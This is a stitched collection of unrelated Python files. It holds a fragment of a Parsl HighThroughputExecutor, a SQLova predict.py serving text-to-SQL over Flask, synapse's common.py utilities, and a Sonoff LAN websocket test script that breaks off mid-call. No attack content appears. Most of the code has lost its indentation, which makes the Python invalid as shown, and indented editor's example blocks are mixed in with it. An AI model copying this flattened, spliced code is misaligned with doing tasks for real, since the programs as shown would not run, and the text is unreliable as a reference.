except TypeError:
raise SerializationError(func.__name__)
msg = {"task_id": task_id,
"buffer": fn_buf}
        # Post task to the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return fut
@property
def scaling_enabled(self):
return self._scaling_enabled
def create_monitoring_info(self, status):
""" Create a msg for monitoring based on the poll status
"""
msg = []
for bid, s in status.items():
d = {}
d['run_id'] = self.run_id
d['status'] = s.status_name
d['timestamp'] = datetime.datetime.now()
d['executor_label'] = self.label
d['job_id'] = self.blocks.get(bid, None)
d['block_id'] = bid
msg.append(d)
return msg
def scale_out(self, blocks=1):
"""Scales out the number of blocks by "blocks"
"""
if not self.provider:
raise (ScalingFailed(None, "No execution provider available"))
block_ids = []
for i in range(blocks):
block_id = str(len(self.blocks))
try:
job_id = self._launch_block(block_id)
self.blocks[block_id] = job_id
self.block_mapping[job_id] = block_id
block_ids.append(block_id)
except Exception as ex:
self._fail_job_async(block_id,
"Failed to start block {}: {}".format(block_id, ex))
return block_ids
def _launch_block(self, block_id: str) -> Any:
if self.launch_cmd is None:
raise ScalingFailed(self.provider.label, "No launch command")
launch_cmd = self.launch_cmd.format(block_id=block_id)
job_id = self.provider.submit(launch_cmd, 1)
logger.debug("Launched block {}->{}".format(block_id, job_id))
if not job_id:
raise(ScalingFailed(self.provider.label,
"Attempts to provision nodes via provider has failed"))
return job_id
def scale_in(self, blocks=None, block_ids=[], force=True, max_idletime=None):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Parameters
----------
blocks : int
Number of blocks to terminate and scale_in by
force : Bool
Used along with blocks to indicate whether blocks should be terminated by force.
When force = True, we will kill blocks regardless of the blocks being busy
When force = False, Only idle blocks will be terminated.
If the # of ``idle_blocks`` < ``blocks``, the list of jobs marked for termination
will be in the range: 0 - ``blocks``.
max_idletime: float
A time to indicate how long a block can be idle.
Used along with force = False to kill blocks that have been idle for that long.
block_ids : list
List of specific block ids to terminate. Optional
Returns
-------
List of job_ids marked for termination
"""
if block_ids:
block_ids_to_kill = block_ids
else:
managers = self.connected_managers
block_info = {}
for manager in managers:
if not manager['active']:
continue
b_id = manager['block_id']
if b_id not in block_info:
block_info[b_id] = [0, float('inf')]
block_info[b_id][0] += manager['tasks']
block_info[b_id][1] = min(block_info[b_id][1], manager['idle_duration'])
sorted_blocks = sorted(block_info.items(), key=lambda item: (item[1][1], item[1][0]))
if force is True:
block_ids_to_kill = [x[0] for x in sorted_blocks[:blocks]]
else:
if not max_idletime:
block_ids_to_kill = [x[0] for x in sorted_blocks if x[1][0] == 0][:blocks]
else:
block_ids_to_kill = []
for x in sorted_blocks:
if x[1][1] > max_idletime and x[1][0] == 0:
block_ids_to_kill.append(x[0])
if len(block_ids_to_kill) == blocks:
break
logger.debug("Selecting block ids to kill since they are idle : {}".format(
block_ids_to_kill))
logger.debug("Current blocks : {}".format(self.blocks))
# Hold the block
for block_id in block_ids_to_kill:
self._hold_block(block_id)
# Now kill via provider
# Potential issue with multiple threads trying to remove the same blocks
to_kill = [self.blocks[bid] for bid in block_ids_to_kill if bid in self.blocks]
r = self.provider.cancel(to_kill)
job_ids = self._filter_scale_in_ids(to_kill, r)
# to_kill block_ids are fetched from self.blocks
# If a block_id is in self.block, it must exist in self.block_mapping
block_ids_killed = [self.block_mapping[jid] for jid in job_ids]
return block_ids_killed
def _get_block_and_job_ids(self) -> Tuple[List[str], List[Any]]:
# Not using self.blocks.keys() and self.blocks.values() simultaneously
# The dictionary may be changed during invoking this function
# As scale_in and scale_out are invoked in multiple threads
block_ids = list(self.blocks.keys())
job_ids = [] # types: List[Any]
for bid in block_ids:
job_ids.append(self.blocks[bid])
return block_ids, job_ids
def shutdown(self, hub=True, targets='all', block=False):
"""Shutdown the executor, including all workers and controllers.
        Currently this only terminates the local interchange process.
Kwargs:
- hub (Bool): Whether the hub should be shutdown, Default: True,
- targets (list of ints| 'all'): List of block id's to kill, Default: 'all'
- block (Bool): To block for confirmations or not
"""
logger.info("Attempting HighThroughputExecutor shutdown")
self.queue_proc.terminate()
logger.info("Finished HighThroughputExecutor shutdown attempt")
return True
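# Editor's sketch (not part of the original module): a minimal, hedged example of
# wiring HighThroughputExecutor into a Parsl configuration on a single local node.
# The label and provider settings below are illustrative assumptions, not values
# taken from this file.
if __name__ == '__main__':
    import parsl
    from parsl.config import Config

    config = Config(
        executors=[
            HighThroughputExecutor(
                label='htex_local',                              # hypothetical label
                cores_per_worker=1,
                provider=LocalProvider(init_blocks=1, max_blocks=1),
            )
        ]
    )
    parsl.load(config)

    @parsl.python_app
    def double(x):
        return 2 * x

    # The returned AppFuture resolves once a pooled worker executes the task.
    print(double(21).result())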
|
predict.py
|
#!/usr/bin/env python
# Use existing model to predict sql from tables and questions.
#
# For example, you can get a pretrained model from https://github.com/naver/sqlova/releases:
# https://github.com/naver/sqlova/releases/download/SQLova-parameters/model_bert_best.pt
# https://github.com/naver/sqlova/releases/download/SQLova-parameters/model_best.pt
#
# Make sure you also have the following support files (see README for where to get them):
# - bert_config_uncased_*.json
# - vocab_uncased_*.txt
#
# Finally, you need some data - some files called:
# - <split>.db
# - <split>.jsonl
# - <split>.tables.jsonl
# - <split>_tok.jsonl # derived using annotate_ws.py
# You can play with the existing train/dev/test splits, or make your own with
# the add_csv.py and add_question.py utilities.
#
# Once you have all that, you are ready to predict, using:
# python predict.py \
# --bert_type_abb uL \ # need to match the architecture of the model you are using
# --model_file <path to models>/model_best.pt \
# --bert_model_file <path to models>/model_bert_best.pt \
# --bert_path <path to bert_config/vocab> \
# --result_path <where to place results> \
# --data_path <path to db/jsonl/tables.jsonl> \
# --split <split>
#
# Results will be in a file called results_<split>.jsonl in the result_path.
import argparse, os
from sqlnet.dbengine import DBEngine
from sqlova.utils.utils_wikisql import *
from train import construct_hyper_param, get_models
from wikisql.lib.query import Query
import annotate_ws
import add_csv
import add_question
from flask import Flask, request
from flask import jsonify
import io
import uuid
import re
## Set up hyper parameters and paths
parser = argparse.ArgumentParser()
parser.add_argument("--model_file", required=True, help='model file to use (e.g. model_best.pt)')
parser.add_argument("--bert_model_file", required=True, help='bert model file to use (e.g. model_bert_best.pt)')
parser.add_argument("--bert_path", required=True, help='path to bert files (bert_config*.json etc)')
parser.add_argument("--data_path", required=True, help='path to *.jsonl and *.db files')
parser.add_argument("--split", required=False, help='prefix of jsonl and db files (e.g. dev)')
parser.add_argument("--result_path", required=True, help='directory in which to place results')
args = construct_hyper_param(parser)
handle_request = None
import threading
thread = None
status = "Loading sqlova model, please wait"
if not args.split:
app = Flask(__name__)
@app.route('/api/process-question', methods=['POST'])
def run():
if handle_request:
return handle_request(request)
else:
return jsonify({"error": status}), 503
def start():
app.run(host='0.0.0.0', port=5050)
thread = threading.Thread(target=start, args=())
thread.daemon = True
thread.start()
# This is a stripped down version of the test() method in train.py - identical, except:
# - does not attempt to measure accuracy and indeed does not expect the data to be labelled.
# - saves plain text sql queries.
#
def predict(data_loader, data_table, model, model_bert, bert_config, tokenizer,
max_seq_length,
num_target_layers, detail=False, st_pos=0, cnt_tot=1, EG=False, beam_size=4,
path_db=None, dset_name='test'):
model.eval()
model_bert.eval()
engine = DBEngine(os.path.join(path_db, f"{dset_name}.db"))
results = []
for iB, t in enumerate(data_loader):
nlu, nlu_t, sql_i, sql_q, sql_t, tb, hs_t, hds = get_fields(t, data_table, no_hs_t=True, no_sql_t=True)
g_sc, g_sa, g_wn, g_wc, g_wo, g_wv = get_g(sql_i)
g_wvi_corenlp = get_g_wvi_corenlp(t)
wemb_n, wemb_h, l_n, l_hpu, l_hs, \
nlu_tt, t_to_tt_idx, tt_to_t_idx \
= get_wemb_bert(bert_config, model_bert, tokenizer, nlu_t, hds, max_seq_length,
num_out_layers_n=num_target_layers, num_out_layers_h=num_target_layers)
if not EG:
# No Execution guided decoding
s_sc, s_sa, s_wn, s_wc, s_wo, s_wv = model(wemb_n, l_n, wemb_h, l_hpu, l_hs)
pr_sc, pr_sa, pr_wn, pr_wc, pr_wo, pr_wvi = pred_sw_se(s_sc, s_sa, s_wn, s_wc, s_wo, s_wv, )
pr_wv_str, pr_wv_str_wp = convert_pr_wvi_to_string(pr_wvi, nlu_t, nlu_tt, tt_to_t_idx, nlu)
pr_sql_i = generate_sql_i(pr_sc, pr_sa, pr_wn, pr_wc, pr_wo, pr_wv_str, nlu)
else:
# Execution guided decoding
prob_sca, prob_w, prob_wn_w, pr_sc, pr_sa, pr_wn, pr_sql_i = model.beam_forward(wemb_n, l_n, wemb_h, l_hpu,
l_hs, engine, tb,
nlu_t, nlu_tt,
tt_to_t_idx, nlu,
beam_size=beam_size)
# sort and generate
pr_wc, pr_wo, pr_wv, pr_sql_i = sort_and_generate_pr_w(pr_sql_i)
# Following variables are just for consistency with no-EG case.
pr_wvi = None # not used
pr_wv_str=None
pr_wv_str_wp=None
pr_sql_q = generate_sql_q(pr_sql_i, tb)
pr_sql_q_base = generate_sql_q_base(pr_sql_i, tb)
for b, (pr_sql_i1, pr_sql_q1, pr_sql_q1_base) in enumerate(zip(pr_sql_i, pr_sql_q, pr_sql_q_base)):
results1 = {}
results1["query"] = pr_sql_i1
results1["table_id"] = tb[b]["id"]
results1["nlu"] = nlu[b]
results1["sql"] = pr_sql_q1
results1["sql_with_params"] = pr_sql_q1_base
rr = engine.execute_query(tb[b]["id"], Query.from_dict(pr_sql_i1, ordered=True), lower=False)
results1["answer"] = rr
results.append(results1)
return results
BERT_PT_PATH = args.bert_path
path_save_for_evaluation = args.result_path
# Load pre-trained models
path_model_bert = args.bert_model_file
path_model = args.model_file
args.no_pretraining = True # counterintuitive, but avoids loading unused models
model, model_bert, tokenizer, bert_config = get_models(args, BERT_PT_PATH, trained=True, path_model_bert=path_model_bert, path_model=path_model)
def run_split(split):
# Load data
dev_data, dev_table = load_wikisql_data(args.data_path, mode=split, toy_model=args.toy_model, toy_size=args.toy_size, no_hs_tok=True)
dev_loader = torch.utils.data.DataLoader(
batch_size=args.bS,
dataset=dev_data,
shuffle=False,
num_workers=1,
collate_fn=lambda x: x # now dictionary values are not merged!
)
# Run prediction
with torch.no_grad():
results = predict(dev_loader,
dev_table,
model,
model_bert,
bert_config,
tokenizer,
args.max_seq_length,
args.num_target_layers,
detail=False,
path_db=args.data_path,
st_pos=0,
dset_name=split, EG=args.EG)
# Save results
save_for_evaluation(path_save_for_evaluation, results, split)
message = {
"split": split,
"result": results
}
return message
def serialize(o):
if isinstance(o, int64):
return int(o)
if args.split:
message = run_split(args.split)
    print(json.dumps(message, indent=2, default=serialize))
exit(0)
def handle_request0(request):
debug = 'debug' in request.form
base = ""
try:
if not 'csv' in request.files:
raise Exception('please include a csv file')
if not 'q' in request.form:
raise Exception('please include a q parameter with a question in it')
csv = request.files['csv']
q = request.form['q']
table_id = os.path.splitext(csv.filename)[0]
table_id = re.sub(r'\W+', '_', table_id)
# it would be easy to do all this in memory but I'm lazy
stream = io.StringIO(csv.stream.read().decode("UTF8"), newline=None)
base = table_id + "_" + str(uuid.uuid4())
add_csv.csv_stream_to_sqlite(table_id, stream, base + '.db')
stream.seek(0)
record = add_csv.csv_stream_to_json(table_id, stream, base + '.tables.jsonl')
stream.seek(0)
add_question.question_to_json(table_id, q, base + '.jsonl')
annotation = annotate_ws.annotate_example_ws(add_question.encode_question(table_id, q),
record)
with open(base + '_tok.jsonl', 'a+') as fout:
fout.write(json.dumps(annotation) + '\n')
message = run_split(base)
code = 200
if not debug:
os.remove(base + '.db')
os.remove(base + '.jsonl')
os.remove(base + '.tables.jsonl')
os.remove(base + '_tok.jsonl')
os.remove('results_' + base + '.jsonl')
if 'result' in message:
message = message['result'][0]
del message['query']
del message['nlu']
del message['table_id']
message['params'] = message['sql_with_params'][1]
message['sql'] = message['sql_with_params'][0]
del message['sql_with_params']
except Exception as e:
message = { "error": str(e) }
code = 500
if debug:
message['base'] = base
return jsonify(message), code
status = "Loading corenlp models, please wait"
annotate_ws.annotate('start up please')
handle_request = handle_request0
thread.join()
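# Editor's sketch: querying the running service from a separate client process.
# The route, port and form fields ('csv', 'q', optional 'debug') mirror
# handle_request0 above; the CSV file name and the question are made up.
#
#     import requests
#     with open('players.csv', 'rb') as f:
#         r = requests.post('http://localhost:5050/api/process-question',
#                           files={'csv': f},
#                           data={'q': 'who is the oldest player?'})
#     print(r.json())   # on success contains 'answer', 'sql' and 'params' keys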
|
common.py
|
import io
import os
import sys
import json
import time
import fcntl
import types
import base64
import fnmatch
import hashlib
import logging
import binascii
import builtins
import functools
import itertools
import threading
import traceback
import contextlib
import collections
import regex
import synapse.exc as s_exc
from synapse.exc import *
import synapse.lib.const as s_const
import synapse.lib.msgpack as s_msgpack
major = sys.version_info.major
minor = sys.version_info.minor
micro = sys.version_info.micro
majmin = (major, minor)
version = (major, minor, micro)
class NoValu: pass
novalu = NoValu()
def now():
'''
Get the current epoch time in milliseconds.
This relies on time.time(), which is system-dependent in terms of resolution.
Examples:
Get the current time and make a row for a Cortex::
tick = now()
row = (someiden, 'foo:prop', 1, tick)
core.addRows([row])
Returns:
int: Epoch time in milliseconds.
'''
return int(time.time() * 1000)
def guid(valu=None):
'''
Get a 16 byte guid value.
By default, this is a random guid value.
Args:
valu: Object used to construct the guid valu from. This must be able
to be msgpack'd.
Returns:
str: 32 character, lowercase ascii string.
'''
if valu is None:
return binascii.hexlify(os.urandom(16)).decode('utf8')
# Generate a "stable" guid from the given item
byts = s_msgpack.en(valu)
return hashlib.md5(byts).hexdigest()
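# Editor's example (illustrative output): guid() is random per call, while
# guid(valu) is stable for the same msgpack-able input.
#
#     guid()               # 32 char lowercase hex, different on every call
#     guid(('foo', 10))    # md5 of the msgpack encoding; identical on every call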
def buid(valu=None):
'''
A binary GUID like sequence of 32 bytes.
Args:
valu (object): Optional, if provided, the hash of the msgpack
encoded form of the object is returned. This can be used to
create stable buids.
Notes:
By default, this returns a random 32 byte value.
Returns:
bytes: A 32 byte value.
'''
if valu is None:
return os.urandom(32)
byts = s_msgpack.en(valu)
return hashlib.sha256(byts).digest()
def ehex(byts):
'''
Encode a set of bytes to a string using binascii.hexlify.
Args:
byts (bytes): Bytes to encode.
Returns:
str: A string representing the bytes.
'''
return binascii.hexlify(byts).decode('utf8')
def uhex(text):
'''
Decode bytes to a string using binascii.unhexlify.
Args:
text (str): Text to decode.
Returns:
bytes: The decoded bytes.
'''
return binascii.unhexlify(text)
guidre = regex.compile('^[0-9a-f]{32}$')
def isguid(text):
return guidre.match(text) is not None
def intify(x):
'''
Ensure ( or coerce ) a value into being an integer or None.
Args:
x (obj): An object to intify
Returns:
(int): The int value ( or None )
'''
try:
return int(x)
except (TypeError, ValueError) as e:
return None
def addpref(pref, info):
'''
Add the given prefix to all elements in the info dict.
'''
return {'%s:%s' % (pref, k): v for (k, v) in info.items()}
def tufo(typ, **kwargs):
return (typ, kwargs)
def vertup(vstr):
'''
Convert a version string to a tuple.
Example:
ver = vertup('1.3.30')
'''
return tuple([int(x) for x in vstr.split('.')])
def genpath(*paths):
path = os.path.join(*paths)
path = os.path.expanduser(path)
path = os.path.expandvars(path)
return os.path.abspath(path)
def reqpath(*paths):
path = genpath(*paths)
if not os.path.isfile(path):
raise NoSuchFile(path)
return path
def reqfile(*paths, **opts):
path = genpath(*paths)
if not os.path.isfile(path):
raise NoSuchFile(path)
opts.setdefault('mode', 'rb')
return io.open(path, **opts)
def reqlines(*paths, **opts):
'''
Open a file and yield lines of text.
Example:
for line in reqlines('foo.txt'):
dostuff(line)
NOTE: This API is used as a performance optimization
over the standard fd line iteration mechanism.
'''
opts.setdefault('mode', 'r')
opts.setdefault('encoding', 'utf8')
rem = None
with reqfile(*paths, **opts) as fd:
bufr = fd.read(10000000)
while bufr:
if rem is not None:
bufr = rem + bufr
lines = bufr.split('\n')
rem = lines[-1]
for line in lines[:-1]:
yield line.strip()
bufr = fd.read(10000000)
        # yield any trailing partial line once the file is exhausted
        if rem:
            yield rem.strip()
def getfile(*paths, **opts):
path = genpath(*paths)
if not os.path.isfile(path):
return None
opts.setdefault('mode', 'rb')
return io.open(path, **opts)
def getbytes(*paths, **opts):
fd = getfile(*paths, **opts)
if fd is None:
return None
with fd:
return fd.read()
def reqbytes(*paths):
with reqfile(*paths) as fd:
return fd.read()
def genfile(*paths):
'''
Create or open ( for read/write ) a file path join.
Args:
*paths: A list of paths to join together to make the file.
Notes:
If the file already exists, the fd returned is opened in ``r+b`` mode.
Otherwise, the fd is opened in ``w+b`` mode.
Returns:
io.BufferedRandom: A file-object which can be read/written too.
'''
path = genpath(*paths)
gendir(os.path.dirname(path))
if not os.path.isfile(path):
return io.open(path, 'w+b')
return io.open(path, 'r+b')
@contextlib.contextmanager
def lockfile(path):
'''
A file lock with-block helper.
Args:
path (str): A path to a lock file.
Examples:
Get the lock on a file and dostuff while having the lock:
path = '/hehe/haha.lock'
with lockfile(path):
dostuff()
Notes:
        This is currently based on fcntl.lockf(), and as such, it is purely
advisory locking. If multiple processes are attempting to obtain a
lock on the same file, this will block until the process which has
the current lock releases it.
Yields:
None
'''
with genfile(path) as fd:
fcntl.lockf(fd, fcntl.LOCK_EX)
yield None
def listdir(*paths, glob=None):
'''
List the (optionally glob filtered) full paths from a dir.
Args:
*paths ([str,...]): A list of path elements
glob (str): An optional fnmatch glob str
'''
path = genpath(*paths)
names = os.listdir(path)
if glob is not None:
names = fnmatch.filter(names, glob)
retn = [os.path.join(path, name) for name in names]
return retn
def gendir(*paths, **opts):
mode = opts.get('mode', 0o700)
path = genpath(*paths)
if not os.path.isdir(path):
os.makedirs(path, mode=mode, exist_ok=True)
return path
def reqdir(*paths):
path = genpath(*paths)
if not os.path.isdir(path):
raise NoSuchDir(path=path)
return path
def jsload(*paths):
with genfile(*paths) as fd:
byts = fd.read()
if not byts:
return None
return json.loads(byts.decode('utf8'))
def gentask(func, *args, **kwargs):
return (func, args, kwargs)
def jssave(js, *paths):
path = genpath(*paths)
with io.open(path, 'wb') as fd:
fd.write(json.dumps(js, sort_keys=True, indent=2).encode('utf8'))
def verstr(vtup):
'''
Convert a version tuple to a string.
'''
return '.'.join([str(v) for v in vtup])
def getexcfo(e):
'''
Get an err tufo from an exception.
Args:
e (Exception): An Exception (or Exception subclass).
Notes:
This can be called outside of the context of an exception handler,
however details such as file, line, function name and source may be
missing.
Returns:
((str, dict)):
'''
tb = sys.exc_info()[2]
tbinfo = traceback.extract_tb(tb)
path, line, name, src = '', '', '', None
if tbinfo:
        path, line, name, src = tbinfo[-1]
retd = {
'msg': str(e),
'file': path,
'line': line,
'name': name,
'src': src
}
if isinstance(e, SynErr):
retd['syn:err'] = e.errinfo
return (e.__class__.__name__, retd)
def reqok(ok, retn):
'''
Raise exception from retn if not ok.
'''
if not ok:
raise RetnErr(retn)
return retn
def excinfo(e):
'''
Populate err,errmsg,errtrace info from exc.
'''
tb = sys.exc_info()[2]
path, line, name, sorc = traceback.extract_tb(tb)[-1]
ret = {
'err': e.__class__.__name__,
'errmsg': str(e),
'errfile': path,
'errline': line,
}
if isinstance(e, SynErr):
ret['errinfo'] = e.errinfo
return ret
def synerr(excname, **info):
'''
Return a SynErr exception. If the given name
is not known, fall back on the base class.
'''
info['excname'] = excname
cls = getattr(s_exc, excname, s_exc.SynErr)
return cls(**info)
def errinfo(name, mesg):
return {
'err': name,
'errmsg': mesg,
}
def chunks(item, size):
'''
Divide an iterable into chunks.
Args:
item: Item to slice
size (int): Maximum chunk size.
Notes:
This supports Generator objects and objects which support calling
the __getitem__() method with a slice object.
Yields:
Slices of the item containing up to "size" number of items.
'''
# use islice if it's a generator
if isinstance(item, types.GeneratorType):
while True:
chunk = tuple(itertools.islice(item, size))
if not chunk:
return
yield chunk
    # The sequence item is empty, yield an empty slice from it.
# This will also catch mapping objects since a slice should
# be an unhashable type for a mapping and the __getitem__
# method would not be present on a set object
if not item:
yield item[0:0]
return
# otherwise, use normal slicing
off = 0
while True:
chunk = item[off:off + size]
if not chunk:
return
yield chunk
off += size
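# Editor's example: chunks() yields list slices for sequences and tuples for
# generators (via itertools.islice).
#
#     list(chunks([1, 2, 3, 4, 5], 2))          # [[1, 2], [3, 4], [5]]
#     list(chunks((x for x in range(5)), 2))    # [(0, 1), (2, 3), (4,)]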
def iterfd(fd, size=10000000):
'''
Generator which yields bytes from a file descriptor.
Args:
fd (file): A file-like object to read bytes from.
size (int): Size, in bytes, of the number of bytes to read from the
fd at a given time.
Notes:
        If the first read call on the file descriptor is an empty bytestring,
        that zero length bytestring will be yielded and the generator will
        then be exhausted. This behavior is intended to allow the yielding of
contents of a zero byte file.
Yields:
bytes: Bytes from the file descriptor.
'''
fd.seek(0)
byts = fd.read(size)
# Fast path to yield b''
    if len(byts) == 0:
yield byts
return
while byts:
yield byts
byts = fd.read(size)
def spin(genr):
'''
Crank through a generator but discard the yielded values.
Args:
genr: Any generator or iterable valu.
Notes:
        This generator is exhausted via the ``collections.deque()``
constructor with a ``maxlen=0``, which will quickly exhaust an
iterator staying in C code as much as possible.
Returns:
None
'''
collections.deque(genr, 0)
def reqStorDict(x):
'''
Raises BadStorValu if any value in the dict is not compatible
with being stored in a cortex.
'''
for k, v in x.items():
if not canstor(v):
raise BadStorValu(name=k, valu=v)
def firethread(f):
'''
A decorator for making a function fire a thread.
'''
@functools.wraps(f)
def callmeth(*args, **kwargs):
thr = worker(f, *args, **kwargs)
return thr
return callmeth
def worker(meth, *args, **kwargs):
thr = threading.Thread(target=meth, args=args, kwargs=kwargs)
thr.setDaemon(True)
thr.start()
return thr
def reqstor(name, valu):
'''
Check to see if a value can be stored in a Cortex.
Args:
name (str): Property name.
valu: Value to check.
Returns:
The valu is returned if it can be stored in a Cortex.
Raises:
BadPropValu if the value is not Cortex storable.
'''
if not canstor(valu):
raise BadPropValu(name=name, valu=valu)
return valu
def rowstotufos(rows):
'''
Convert rows into tufos.
Args:
rows (list): List of rows containing (i, p, v, t) tuples.
Returns:
list: List of tufos.
'''
res = collections.defaultdict(dict)
[res[i].__setitem__(p, v) for (i, p, v, t) in rows]
return list(res.items())
sockerrs = (builtins.ConnectionError, builtins.FileNotFoundError)
def to_bytes(valu, size):
return valu.to_bytes(size, byteorder='little')
def to_int(byts):
return int.from_bytes(byts, 'little')
def enbase64(b):
return base64.b64encode(b).decode('utf8')
def debase64(b):
return base64.b64decode(b.encode('utf8'))
def canstor(s):
return type(s) in (int, str)
def makedirs(path, mode=0o777):
os.makedirs(path, mode=mode, exist_ok=True)
def iterzip(*args):
return itertools.zip_longest(*args)
def setlogging(mlogger, defval=None):
'''
Configure synapse logging.
Args:
mlogger (logging.Logger): Reference to a logging.Logger()
defval (str): Default log level
Notes:
This calls logging.basicConfig and should only be called once per process.
Returns:
None
'''
log_level = os.getenv('SYN_DMON_LOG_LEVEL',
defval)
if log_level: # pragma: no cover
log_level = log_level.upper()
if log_level not in s_const.LOG_LEVEL_CHOICES:
raise ValueError('Invalid log level provided: {}'.format(log_level))
logging.basicConfig(level=log_level, format=s_const.LOG_FORMAT)
mlogger.info('log level set to %s', log_level)
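# Editor's sketch: typical logging set-up at process start; a SYN_DMON_LOG_LEVEL
# environment variable overrides the default passed here.
#
#     logger = logging.getLogger(__name__)
#     setlogging(logger, defval='DEBUG')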
|
test_sonoff.py
|
#!/usr/bin/env python3
# This script can be used to test 2-way communication with a Sonoff device in LAN mode.
# When executed (e.g. from a terminal with `python test_sonoff.py`), it will open a WebSocket connection on port 8081
# to the device on the IP address you specify below, simulating the eWeLink mobile app.
# Any messages sent to or received by the device are logged to the log file 'test_sonoff.log' for further research.
SONOFF_LAN_IP = "localhost" # Replace with the IP address of the Sonoff you want to test, e.g. "192.168.0.112"
LOG_LEVEL = "DEBUG"
import json
import random
import threading
import time
import logging
import logging.config
import websocket
class Sonoff:
def __init__(self):
self.logger = self.configure_logger('default', 'test_sonoff.log')
self.logger.debug('Sonoff class initialising')
self._wshost = SONOFF_LAN_IP
self._wsport = "8081"
self._wsendpoint = "/"
self._ws = None
self._devices = []
        # pass the callable and its argument so the websocket loop runs on the worker thread
        self.thread = threading.Thread(target=self.init_websocket, args=(self.logger,))
self.thread.daemon = False
self.thread.start()
# Listen for state updates from HASS and update the device accordingly
async def state_listener(self, event):
if not self.get_ws().connected:
self.logger.error('websocket is not connected')
return
self.logger.debug('received state event change from: %s' % event.data['deviceid'])
new_state = event.data['state']
# convert from True/False to on/off
if isinstance(new_state, (bool)):
new_state = 'on' if new_state else 'off'
device = self.get_device(event.data['deviceid'])
outlet = event.data['outlet']
        if not device:
            self.logger.error('unknown device to be updated')
            return False
        if outlet is not None:
            self.logger.info("Switching `%s - %s` on outlet %d to state: %s", device['deviceid'], device['name'],
                             (outlet + 1), new_state)
        else:
            self.logger.info("Switching `%s` to state: %s", device['deviceid'], new_state)
if outlet is not None:
params = {'switches': device['params']['switches']}
params['switches'][outlet]['switch'] = new_state
else:
params = {'switch': new_state}
payload = {
'action': 'update',
'userAgent': 'app',
'params': params,
'apikey': 'apikey', # No apikey needed in LAN mode
'deviceid': str(device['deviceid']),
'sequence': str(time.time()).replace('.', ''),
'controlType': device['params']['controlType'] if 'controlType' in device['params'] else 4,
'ts': 0
}
self.logger.debug('sending state update websocket msg: %s', json.dumps(payload))
self.get_ws().send(json.dumps(payload))
# set also the pseudo-internal state of the device until the real refresh kicks in
for idxd, dev in enumerate(self._devices):
if dev['deviceid'] == device['deviceid']:
if outlet is not None:
self._devices[idxd]['params']['switches'][outlet]['switch'] = new_state
else:
self._devices[idxd]['params']['switch'] = new_state
def init_websocket(self, logger):
self.logger = logger
self.logger.debug('initializing websocket')
self._ws = WebsocketListener(sonoff=self, on_message=self.on_message, on_error=self.on_error)
try:
# 145 interval is defined by the first websocket response after login
self._ws.run_forever(ping_interval=145)
except:
self.logger.error('websocket error occurred, shutting down')
finally:
self._ws.close()
def on_message(self, *args):
data = args[-1] # to accommodate the weird behaviour where the function receives 2 or 3 args
self.logger.debug('received websocket msg: %s', data)
data = json.loads(data)
if 'action' in data:
self.logger.info('received action: %s', data['action'])
if data['action'] == 'update' and 'params' in data:
self.logger.debug('found update action in websocket update msg')
if 'switch' in data['params'] or 'switches' in data['params']:
self.logger.debug('found switch/switches in websocket update msg')
self.logger.debug(
                        'searching for deviceid: {} in known devices {}'.format(data['deviceid'],
                                                                                self._devices.__str__())
)
found_device = False
for idx, device in enumerate(self._devices):
if device['deviceid'] == data['deviceid']:
self._devices[idx]['params'] = data['params']
found_device = True
if 'switches' in data['params']:
for switch in data['params']['switches']:
                                    self.set_entity_state(data['deviceid'], switch['switch'], switch['outlet'])
else:
self.set_entity_state(data['deviceid'], data['params']['switch'])
break
if not found_device:
self.logger.debug('device not found in known devices, adding')
self.add_device(data)
elif 'deviceid' in data:
self.logger.debug('received hello from deviceid: %s, no action required', data['deviceid'])
def on_error(self, *args):
error = args[-1] # to accommodate the case when the function receives 2 or 3 args
self.logger.error('websocket error: %s' % str(error))
def set_entity_state(self, deviceid, state, outlet=None):
entity_id = 'switch.%s%s' % (deviceid, '_' + str(outlet + 1) if outlet is not None else '')
self.logger.info("Success! TODO: update HASS state for entity: `%s` to state: %s", entity_id, state)
def add_device(self, device):
self._devices.append(device)
return self._devices
def get_devices(self):
return self._devices
def get_device(self, deviceid):
for device in self.get_devices():
if 'deviceid' in device and device['deviceid'] == deviceid:
return device
def get_ws(self):
return self._ws
def get_wshost(self):
return self._wshost
def get_wsport(self):
return self._wsport
def get_wsendpoint(self):
return self._wsendpoint
def configure_logger(self, name, log_path):
logging.config.dictConfig({
'version': 1,
'formatters': {
'default': {'format': '%(asctime)s - %(levelname)s - %(message)s', 'datefmt': '%Y-%m-%d %H:%M:%S'}
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'default',
'stream': 'ext://sys.stdout'
},
'file': {
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'default',
'filename': log_path,
'maxBytes': 10000,
'backupCount': 3
}
},
'loggers': {
'default': {
'level': LOG_LEVEL,
'handlers': ['console', 'file']
}
},
'disable_existing_loggers': False
})
return logging.getLogger(name)
class WebsocketListener(threading.Thread, websocket.WebSocketApp):
def __init__(self, sonoff, on_message=None, on_error=None):
self.logger = sonoff.logger
self._sonoff = sonoff
websocket_host = 'ws://{}:{}{}'.format(self._sonoff.get_wshost(),
self._sonoff.get_wsport(),
self._sonoff.get_wsendpoint())
self.logger.info('WebsocketListener initialising, connecting to host: %s' % websocket_host)
threading.Thread.__init__(self)
websocket.WebSocketApp.__init__(self, websocket_host,
on_open=self.on_open,
on_error=on_error,
on_message=on_message,
on_close=self.on_close)
self.connected = False
self.last_update = time.time()
def on_open(self, *args):
self.connected = True
self.last_update = time.time()
payload = {
'action': "userOnline",
'userAgent': 'app',
'version': 6,
'nonce': ''.join([str(random.randint(0, 9)) for i in range(15)]),
'apkVesrion': "1.8",
'os': 'ios',
'at': 'at', # No bearer token needed in LAN mode
'apikey': 'apikey', # No apikey needed in LAN mode
'ts': str(int(time.time())),
'model': 'iPhone10,6',
'romVersion': '11.1.2',
'sequence': str(time.time()).replace('.', '')
}
self.logger.debug('sending user online websocket msg: %s', json.dumps(payload))
self.send(json.dumps(payload))
def on_close(self, *args):
self.logger.debug('websocket closed')
self.connected = False
def run_forever(self, sockopt=None, sslopt=None, ping_interval=5, ping_timeout=None,
http_proxy_host=None, http_proxy_port=None,
http_no_proxy=None, http_proxy_auth=None,
skip_utf8_validation=False,
host=None, origin=None, dispatcher=None,
suppress_origin=False, proxy_type=None):
self.logger.debug('attempting to call WebSocketApp run_forever with ping_interval: {}'.format(ping_interval))
websocket.WebSocketApp.run_forever(self,
sockopt=sockopt,
sslopt=sslopt,
